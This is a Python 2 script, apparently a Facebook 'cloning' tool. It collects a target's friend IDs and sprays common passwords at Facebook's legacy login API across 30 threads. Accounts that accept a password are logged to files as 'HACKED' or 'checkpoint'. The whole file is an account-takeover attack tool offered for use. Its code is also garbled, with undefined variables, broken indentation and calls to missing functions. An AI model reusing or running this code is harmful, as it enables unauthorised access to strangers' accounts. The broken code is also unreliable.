
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(30000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 Star-brand')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/12.0 (Android; Opera Mini/52.2.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 8.1.0; Chrome/79.0.3945.116) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36')]
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

def exb():
    print '[!] Exit Successfully \n You like Somi?\n '
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		
		print("\r\x1b[1;93mW\033[1;96m A\033[1;92m I\033[1;95m T\x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """
\033[1;91m _______       _____       _______      _____
\033[1;93m |______      |     |      |  |  |        |  
\033[1;92m ______|      |_____|      |  |  |      __|__                       
\033[1;93m _______      _______      _______       ______
\033[1;92m |______         |         |_____|      |_____/
\033[1;96m ______|         |         |     |      |    \_
\033[1;91m ______        _____       __   __      __   __
\033[1;93m |_____]      |     |        \_/          \_/  
\033[1;96m |_____]      |_____|         |            |   
                                               

                                               
  
                                             

"""
logo1 = """
\033[1;91m _______       _____       _______      _____
\033[1;93m |______      |     |      |  |  |        |  
\033[1;92m ______|      |_____|      |  |  |      __|__                       
\033[1;93m _______      _______      _______       ______
\033[1;92m |______         |         |_____|      |_____/
\033[1;96m ______|         |         |     |      |    \_
\033[1;91m ______        _____       __   __      __   __
\033[1;93m |_____]      |     |        \_/          \_/  
\033[1;96m |_____]      |_____|         |            |   
"""
logo2 = """
\033[1;91m═════════════════════════════════════════════
\033[1;97m✮✮✮✮PAKISTAN CLONING CODE✮✮✮✮
\033[1;91m═════════════════════════════════════════════
\033[1;47m\033[1;91mJAZZ\033[1;0m║▶\033[1;96m00,01,02,03,04,05,06,07,08,09
\033[1;47m\033[1;91mZONG\033[1;0m║▶\033[1;94m10,11,12,13,14,15,17,18
\033[1;47m\033[1;91mWARID\033[1;0m║▶\033[1;93m21,22,23,24
\033[1;47m\033[1;91mUFONE\033[1;0m║▶\033[1;95m31,32,33,34,35
\033[1;47m\033[1;91mTELENOR\033[1;0m║▶\033[1;92m40,41,42,43,44,45,46,47,48,49
\033[1;91m═════════════════════════════════════════════
"""
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def Somi():
    os.system('clear')
    print logo1
    print 47* '\033[1;96m▬\033[1;91m▬'
    print
    jalan('\x1b[1;91m꧁\x1b[1;92mA\x1b[1;96m꧂ \x1b[1;91mTYPE \033[1;96m•somi•\033[1;93m THEN START CRACKING')
    print
    jalan('\x1b[1;96m꧁\x1b[1;92mB\x1b[1;93m꧂ \x1b[1;91mTYPE \033[1;96m•youtube•\033[1;93m THEN OPEN YOUTUBE CHANNEL ')
    print 
    jalan('\x1b[1;95m꧁\x1b[1;92mC\x1b[1;93m꧂ \x1b[1;91mTYPE \033[1;96m•stop•\033[1;93m THEN STOP PROGRAM ')
    print
    print 47* '\033[1;96m▬\033[1;91m▬'
    pilih_Somi()
   
def pilih_Somi():    
    Somi = raw_input("\n\033[1;96m>>>\033[1;93m")
    if Somi =="":
        print "\x1b[1;97mSORRY WRONG "
        pilih_Somi()
        Somi()
    elif Somi =="somi":
    	os.system("clear")
        print logo1
        print logo2
        idt = raw_input("\033[1;96m \033[1;93mEnter ID \033[1;91m: \033[1;97m")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token")
			op = json.loads(jok.text)
			print"\033[1;96m[\033[1;97m \033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "]
		except KeyError:
			print"\033[1;96m \x1b[1;91mID Not Found!"
			raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
			super()
		jalan('\033[1;96m \033[1;93mGetting IDs \033[1;97m...')
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token")
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	
	elif Somi =="0":
		menu()
	else:
		print "\033[1;96m \x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;96m \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
	jalan('\033[1;96m \033[1;93mStarting \033[1;97m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;96m[\033[1;97m \033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
	print
	print('\x1b[1;96m \x1b[1;93mTo Stop Process Press CTRL Then Press z . ')
	print 42*"\033[1;96m_"
        
    
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = ('786786')
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;91m  ' + k + c + user + '\033[1;97m  | \033[1;92m ' + pass1                                       
                okb = open('save/successful.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;96m(Check\033[1;95mpoint)\033[1;93m ' + k + c + user + ' \033[1;97m |\033[1;92m  ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = k + c + user
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;91m  ' + k + c + user +  '  \033[1;97m|  \033[1;92m' + pass2
                        okb = open('save/cloned.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;96m(Check\033[1;95mpoint)\033[1;93m ' + k + c + user + ' \033[1;97m |\033[1;92m  ' + pass2
                            cps = open('save/cloned.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="Pakistan"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;91m  ' + k + c + user + '\033[1;97m  |\033[1;92m   ' + pass3
                                okb = open('save/successful.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;96m(Check\033[1;95mpoint)\033[1;93m ' + k + c + user + '  \033[1;97m|  \033[1;92m' + pass3 
                                    cps = open('save/checkpoint.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4="khankhan"
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;91m  ' + k + c + user + ' \033[1;97m | \033[1;92m ' + pass4 
                                        okb = open('save/successful.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;96m(Check\033[1;95mpoint) \033[1;93m' + k + c + user + '  \033[1;97m|  \033[1;92m' + pass4
                                            cps = open('save/checkpoint.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5="786786"
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;91m  ' + k + c + user + ' \033[1;97m |\033[1;92m  ' + pass5
                                                okb = open('save/successful.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;96m(Check\033[1;95mpoint)\033[1;93m ' + k + c + user + ' \033[1;97m |\033[1;92m  ' + pass5 
                                                    cps = open('save/checkpoint.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                
                                                                                                                                                                               
                                                                                                                                                                                                 
        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;93mYOU LIKE SOMI COMMAND?....'
    print '[\xe2\x9c\x93] \x1b[1;92mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96l4mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    print '[\xe2\x9c\x93] \x1b[1;96mFACEBOOK\033[1;91m Somi Awan ....'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    somi() 
          
if __name__ == '__main__':
    Somi()

